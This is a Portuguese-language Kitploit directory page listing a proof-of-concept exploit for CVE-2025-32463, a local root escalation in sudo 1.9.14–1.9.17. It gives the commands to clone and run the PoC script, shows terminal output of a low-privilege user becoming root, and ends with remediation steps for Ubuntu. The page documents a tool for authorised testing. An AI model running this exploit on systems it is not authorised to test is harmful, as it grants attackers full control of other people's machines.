Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/khoazero123/cve-2025-32463
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoPapers e PesquisaAprendizado e Educação
GitHubkhoazero123/cve-2025-32463

CVE-2025-32463

Prova de conceito de exploit para CVE-2025-32463, uma escalada local de privilégios nas versões 1.9.14-1.9.17 do sudo, com biblioteca pré-compilada e instruções de remediação.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-32463 – Exploit de EoP no Sudo (PoC) com biblioteca pré-compilada

Este repositório contém uma prova de conceito (PoC) para a CVE-2025-32463, uma vulnerabilidade de escalonamento local de privilégios no sudo, descoberta por Rich Mirch.

Crédito

https://github.com/kh4sh3i/CVE-2025-32463

⚠️ Aviso Legal

Esta PoC é apenas para fins educacionais e de testes autorizados. Não use este código em sistemas que você não possui ou para os quais não tem permissão explícita de avaliação.


🔧 Requisitos

  • sudo com suporte a chroot (-R): versão 1.9.14 a 1.9.17
  • nsswitch habilitado

🚀 Como executar a PoC

root@kitploit:~
git clone https://github.com/zinzloun/CVE-2025-32463.git
cd CVE-2025-32463

Verifique se o usuário atual tem privilégios baixos

root@kitploit:~
:~/CVE-2025-32463$ id
uid=1001(poc) gid=1001(poc) groups=1001(poc),100(users)

Verifique os requisitos

root@kitploit:~
:~/CVE-2025-32463$ sudo --version
Sudo version 1.9.15p5
...
:~/CVE-2025-32463$ ls -al /etc/nsswitch.conf
-rw-r--r-- 1 root root 526 Feb 16 20:57 /etc/nsswitch.conf

Execute o exploit

root@kitploit:~
:~/CVE-2025-32463$ chmod +x poc.sh && ./poc.sh
woot!
root@ubutes01:/# id
uid=0(root) gid=0(root) groups=0(root),100(users),1001(poc)

🚒 Correção no Ubuntu 24.04 LTS

  • Para sistemas conectados, basta executar

    root@kitploit:~
    sudo apt update && sudo apt upgrade
    
  • Para sistemas isolados (air gapped): você pode obter o pacote sudo mais recente aqui: https://github.com/sudo-project/sudo/releases/download/v1.9.17p1/sudo_1.9.17-2_ubu2404_amd64.deb. Depois que o pacote for transferido para o sistema de destino, basta executar:

    root@kitploit:~
     sudo dpkg -i sudo_1.9.17-2_ubu2404_amd64.deb
    
Baixar ferramenta